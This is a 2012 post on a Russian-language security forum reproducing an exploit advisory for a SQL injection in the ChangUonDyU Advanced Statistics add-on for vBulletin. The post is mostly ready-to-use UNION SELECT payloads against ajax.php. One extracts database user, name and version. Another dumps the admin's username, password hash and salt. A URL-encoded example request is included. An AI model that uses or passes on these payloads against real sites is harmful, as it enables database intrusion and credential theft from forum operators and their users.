HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей vBulletin]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 25.11.2012, 08:27
eman
Новичок
Регистрация: 07.11.2010
Сообщений: 8
С нами: 8164406

Репутация: 0
По умолчанию
vBulletin ChangUonDyU Advanced Statistics SQL Injection Vulnerability

# Exploit Title: vBulletin ChangUonDyU Advanced Statistics - SQL Injection

Vulnerability

# Google Dork: No Dork

# Date: 19/10/2012

# Exploit Author: Juno_okyo

# Vendor Homepage: http://hoiquantinhoc.com

# Software Link:

http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html

# Version: vBulletin 3 & 4

# Tested on: Windows 7

# CVE : http://www.vbulletin.com/

#

################################################## ############################################

Vulnerability:

################################################## ############################################

SQL Injection was found in ChangUonDyU Advanced Statistics.

Query on ajax.php

################################################## ############################################

Exploitation:

################################################## ############################################

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,concat_ws(0x7c,user(),database(),version()),3,4, 5,6,7,8,9,10-- -&result=20

or:

ajax.php?do=inforum&listforumid=100) UNION SELECT

1,2,3,4,5,6,concat_ws(0x7c,username,password,salt) ,8,9,10,11 from user

where userid=1-- -&result=20

################################################## ############################################

Ex:

################################################## ############################################

http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20S ELECT%201,concat_ws%280x7c,user%28%29,database%28% 29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20

################################################## ############################################

More Details:

################################################## ############################################

Website: http://junookyo.blogspot.com/

About Exploit:

http://junookyo.blogspot.com/2012/10/vbb-changuondyu-advanced-statistics-sql.html

################################################## ############################################

Great thanks to James, Juno_okyo & J2TeaM, VNHack Group

################################################## ############################################
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.